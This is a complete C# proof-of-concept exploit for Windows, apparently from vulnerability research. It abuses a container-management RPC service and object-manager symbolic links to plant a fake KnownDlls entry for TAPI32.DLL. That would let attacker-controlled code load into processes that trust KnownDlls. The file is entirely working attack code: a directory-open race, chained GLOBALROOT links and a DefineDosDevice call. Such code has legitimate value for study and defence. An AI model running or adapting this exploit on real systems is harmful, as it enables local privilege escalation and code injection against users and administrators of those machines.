﻿using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Win32;
using System;

namespace POC
{
    class Program
    {
        const string TargetDir = @"\GLOBAL??\KnownDlls";
        const string DummySection = @"\RPC Control\dummy_section";
        const string DllName = "TAPI32.DLL";

        static bool CheckSymlink()
        {
            using (var obj_attr = new ObjectAttributes($@"\KnownDlls\{DllName}"))
            {
                using (var link = NtSymbolicLink.Open(obj_attr, SymbolicLinkAccessRights.MaximumAllowed, false))
                {
                    if (link.IsSuccess)
                    {
                        Console.WriteLine("Target of link {0} is {1}", link.Result.FullPath, link.Result.Target);
                    }
                    return link.IsSuccess;
                }
            }
        }

        static NtDirectory OpenAppContainerDirectory()
        {
            return NtDirectory.OpenSessionDirectory("AppContainerNamedObjects");
        }

        private static NtDirectory _captured_dir;

        static void GetDirectory()
        {
            using (var obj_attr = new ObjectAttributes(TargetDir, AttributeFlags.CaseInsensitive))
            {
                while (true)
                {
                    var dir = NtDirectory.Open(obj_attr, DirectoryAccessRights.MaximumAllowed, false);
                    if (dir.IsSuccess)
                    {
                        _captured_dir = dir.Result;
                        break;
                    }
                }
            }
        }

        static NtSymbolicLink CreateSymlink(Sid package_sid)
        {
            using (var dir = OpenAppContainerDirectory())
            {
                return NtSymbolicLink.Create(package_sid.ToString(), dir, TargetDir);
            }
        }

        static void ExploitDirectory(Sid package_sid)
        {
            // Create \GLOBAL??\KnownDlls\LINK.DLL -> Dummy
            // Create \??\GLOBALROOT -> \GLOBAL??
            // Will open \??\GLOBALROOT\KnownDlls\LINK.DLL which points to \GLOBAL??\KnownDlls\LINK.DLL
            // The opens \GLOBAL??\GLOBALROOT\KnownDlls\LINK.DLL which points to \KnownDlls\LINK.DLL

            using (var list = new DisposableList())
            {
                list.AddResource(NtSymbolicLink.Create(DllName, _captured_dir, @"\Dummy"));
                list.AddResource(NtSymbolicLink.Create(@"\??\GLOBALROOT", null, @"\GLOBAL??"));
                var link = list.AddResource(NtSymbolicLink.Open($@"\??\GLOBALROOT\KnownDlls\{DllName}"));
                Console.WriteLine($"Final path is {link.FullPath}");
                Win32Utils.DefineDosDevice(DefineDosDeviceFlags.NoBroadcastSystem | DefineDosDeviceFlags.RawTargetPath,
                    $@"GLOBALROOT\KnownDlls\{DllName}", DummySection);
            }
        }

        static void StartContainer()
        {
            using (var list = new DisposableList())
            {
                var token = list.AddResource(NtToken.OpenProcessToken(true));

                Client c = new Client();
                c.Connect();

                Guid guid = Guid.NewGuid();
                Console.WriteLine("Generating VM Guid: {0}", guid);

                Sid package_sid = TokenUtils.DerivePackageSidFromName($"cmproxyd-{guid}");
                

                Container_Config s1 = new Container_Config();
                s1.Owner = "Madrid";
                s1.Member8 = 4;
                s1.Member10 = new NdrUInt3264();

                Struct_3 s3 = new Struct_3();
                s3.Member0 = 1;
                s3.Member8 = new string[] { NtProcess.Current.User.ToString() };
                s1.Member18 = s3;

                s1.Member28 = 0x1000;
                s1.Member38 = new Struct_2();
                s1.Member40 = 3;
                s1.Member48 = token;

                int result = c.CmsRpcSrv_CreateContainer(guid, 5, s1, out Struct_7 s7, out NdrContextHandle container_handle);
                if (result != 0)
                {
                    throw new ArgumentException($"CreateContainer: {result}");
                }

                try
                {
                    result = c.CmsRpcSrv_EnableContainerNotifications(container_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"EnableNotify: {result}");
                    }

                    // 5000, timeout?
                    result = c.CmsRpcSrv_CreateActivity(container_handle, 5000, out Struct_7 s7_2, out NdrContextHandle activity_handle);
                    if (result != 0)
                    {
                        throw new ArgumentException($"CreateActivity: {result}");
                    }

                    try
                    {
                        list.AddResource(CreateSymlink(package_sid));

                        result = c.CmsRpcSrv_StartActivityAsync(activity_handle);
                        if (result != 0)
                        {
                            throw new ArgumentException($"Start: {result}");
                        }

                        GetDirectory();
                        ExploitDirectory(package_sid);
                    }
                    finally
                    {
                        c.CmsRpcSrv_CloseActivity(ref activity_handle);
                    }
                }
                finally
                {
                    c.CmsRpcSrv_CloseContainer(ref container_handle);
                }
            }
        }

        static void Main()
        {
            try
            {
                if (!CheckSymlink())
                {
                    StartContainer();
                }

                if (!CheckSymlink())
                {
                    throw new ArgumentException("Error creating KnownDlls symlink.");
                }

                Console.WriteLine("Done.");
                return;
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
